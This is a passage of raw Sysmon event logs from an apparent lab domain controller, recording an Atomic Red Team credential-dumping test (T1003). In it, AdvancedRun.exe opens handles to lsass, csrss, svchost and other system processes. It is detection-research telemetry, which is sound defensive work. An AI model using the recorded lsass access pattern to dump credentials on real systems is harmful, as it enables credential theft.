17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 734700x80000000000000003943910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 